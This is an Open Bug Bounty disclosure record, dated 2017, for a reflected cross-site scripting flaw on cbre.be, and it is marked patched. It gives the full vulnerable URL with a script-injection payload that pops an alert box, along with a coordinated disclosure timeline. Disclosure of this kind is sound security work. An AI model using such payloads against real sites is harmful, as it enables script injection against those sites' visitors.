cbre.be XSS vulnerability

2017-11-11T14:17:00
ID OBB:409629
Type openbugbounty
Reporter M0r3h4x
Modified 2017-12-16T08:38:00

Description

Vulnerable URL:
http://www.cbre.be/PropertySearchDataCentreNew/htdocs/searchresults/includeSearchResults.jsp?pager.offset=25&name;=xss%3C/script%3E%3Cscript%3Ealert(%27openbugbounty%27)%3C/script%3E&letOrSale;=&selCode;=null&regionCode;=null&countryCode;=&sizeMin;=null&sizeMax;=null&priceMin;=null&priceMax;=null&addedProperty;=null&mapView;=N&uomlCode;=null&curCode;=null&orderBy;=null%20ASC,%20COU_DESCRIPTION%20ASC&display;=25&p;_pageGroup=uk_datacentre&p;_page=searchresults&p;_action=null&sessionId;=5d014b32bd63ae8d401d03bac08036cdb0956c2615009c98ecb07648266f5110
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 7476853
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 11 November, 2017 14:17 GMT
Generic security notifications sent to website owner| 11 November, 2017 14:19 GMT
Vulnerability details disclosed by researcher| 15 December, 2017 16:19 GMT
Vulnerability patched by the website owner| 16 December, 2017 08:38 GMT